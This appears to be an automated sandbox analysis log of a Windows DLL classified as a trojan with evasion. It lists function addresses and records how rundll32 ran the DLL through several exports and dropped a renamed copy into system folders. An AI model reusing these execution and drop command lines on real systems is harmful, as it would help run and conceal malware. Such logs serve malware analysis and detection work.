                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00950C66
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00946B91
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00951987
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00937D87
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0093F984
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0093938F
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_009477A7
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0094BFA1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_009333A9
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0094E7DA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_009489DA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_009413DB
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00935DC3
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_009339C3
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00944DC5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00940FC5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00932DC5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_009491F7
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00931DF9
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0094D5FE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00936BFE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_009535E3
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0093FBEF
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0093B7EC
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00938112
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00934716
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00935314
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00948518
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00953306
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0094710D
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0094D10B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00943130
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0093E336
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00937739
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0094473A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00936125
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0094CF2C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0093B12E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00938D59
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0093635F
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00934F42
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0094C145
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00952D4F
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0095314A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00932176
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0094C772
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00932575
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00945B7C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0093597D
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00932B7C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0094F561
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00935166
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0093DD66
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00952560
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00939565
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0093196D
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0093996C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E9C5EA0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E9CA6D0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E9CE6E0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E9C66E0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E9D0F10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E9C1C10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E9C75F4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E9C9D50
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E9E0A61
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E9CD380
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E9C38C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E9D01D0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012E3130
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012D5314
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012D8112
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012D196D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012D2B7C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012D8D59
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012EED95
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012E91F7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012EE7DA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012E89DA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012EBA18
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012E604E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012E56A9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012DAEB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012F06EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012ECF2C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012DB12E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012D6125
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012D7739
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012E473A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012DE336
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012E710D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012ED10B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012F3306
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012E8518
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012D4716
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012D996C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012D9565
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012D5166
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012DDD66
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012EF561
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012F2560
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012D597D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012E5B7C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012D2575
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012D2176
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012EC772
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012F2D4F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012F314A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012EC145
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012D4F42
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012D635F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012D33A9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012E77A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012EBFA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012D938F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012F1987
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012DF984
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012D7D87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012E6B91
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012DB7EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012DFBEF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012F35E3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012ED5FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012D6BFE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012D1DF9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012D2DC5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012E4DC5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012E0FC5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012D5DC3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012D39C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012E13DB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012E0824
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012ECC3F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012D3E3B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012E0A37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012DF20D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012F2C16
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012E1C12
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012F0C66
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012EE478
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012F1C71
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012E645F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012D68AD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012DF4A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012E04A4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012E3ABE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012EB0BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012D3085
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012DF699
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012DD899
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012DC69B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012DA8E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012DE6FD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012F20F8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012DBEF5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012D54C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012E7EDD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012F0AD3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E9C5EA0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E9CA6D0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E9CE6E0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E9C66E0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E9D0F10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E9C1C10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E9C75F4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E9C9D50
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E9E0A61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E9CD380
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E9C38C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E9D01D0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_01208112
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0121F561
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0120DD66
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0120996C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0120196D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_01202176
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_01202B7C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_01215B7C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0120635F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_012033A9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0120F984
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0121ED95
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0120B7EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0120FBEF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_012191F7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_01214DC5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_012113DB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0121E7DA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_01220C66
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_012156A9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0120F699
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0120C69B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_012220F8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_01206125
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0121CF2C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0120B12E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_01213130
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0120E336
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_01207739
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0121473A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_01223306
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0121D10B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0121710D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_01205314
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_01204716
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_01218518
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_01222560
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_01209565
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_01205166
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0121C772
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_01202575
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0120597D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_01204F42
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0121C145
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0122314A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_01222D4F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_01201750
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_01208D59
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0121BFA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_012177A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_01221987
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_01207D87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0120938F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_01216B91
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_012235E3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_01201DF9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_01206BFE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0121D5FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_01205DC3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_012039C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_01210FC5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_01202DC5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_012189DA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_01210824
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_01210A37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_01203E3B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0121CC3F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0120F20D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_01211C12
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_01222C16
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0121BA18
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_01221C71
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0121E478
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0121604E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0121645F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_012104A4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0120F4A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_012068AD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0120AEB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0121B0BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_01213ABE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_01203085
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0120D899
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0120A8E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_012206EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0120BEF5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0120E6FD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_012054C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_01220AD3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_01217EDD
                      Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6E9C1C10 appears 97 times
                      Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6E9DD350 appears 33 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E9C1C10 appears 97 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E9DD350 appears 33 times
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
                      Source: 2gyA5uNl6VPQUA.dllVirustotal: Detection: 17%
                      Source: 2gyA5uNl6VPQUA.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\2gyA5uNl6VPQUA.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\2gyA5uNl6VPQUA.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2gyA5uNl6VPQUA.dll,Control_RunDLL
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2gyA5uNl6VPQUA.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2gyA5uNl6VPQUA.dll,axamexdrqyrgb
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2gyA5uNl6VPQUA.dll,bhramccfbdd
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\2gyA5uNl6VPQUA.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qrcyfrqyrevqn\zfjlg.mpd",GeWefLGOgdb
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\2gyA5uNl6VPQUA.dll",Control_RunDLL
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 6376 -ip 6376
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\2gyA5uNl6VPQUA.dll",Control_RunDLL
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6376 -s 304
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 164 -p 6376 -ip 6376
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6376 -s 308
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Qrcyfrqyrevqn\zfjlg.mpd",Control_RunDLL
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\2gyA5uNl6VPQUA.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2gyA5uNl6VPQUA.dll,Control_RunDLL
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2gyA5uNl6VPQUA.dll,axamexdrqyrgb
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2gyA5uNl6VPQUA.dll,bhramccfbdd
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2gyA5uNl6VPQUA.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qrcyfrqyrevqn\zfjlg.mpd",GeWefLGOgdb
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\2gyA5uNl6VPQUA.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\2gyA5uNl6VPQUA.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\2gyA5uNl6VPQUA.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Qrcyfrqyrevqn\zfjlg.mpd",Control_RunDLL
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 6376 -ip 6376
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6376 -s 304
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 164 -p 6376 -ip 6376
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6376 -s 308
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etlJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERF6A5.tmpJump to behavior
                      Source: classification engineClassification label: mal88.troj.evad.winDLL@37/14@0/29
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0120EF64 CreateToolhelp32Snapshot,
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2gyA5uNl6VPQUA.dll,Control_RunDLL
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6376
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:6284:64:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:7092:64:WilError_01
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
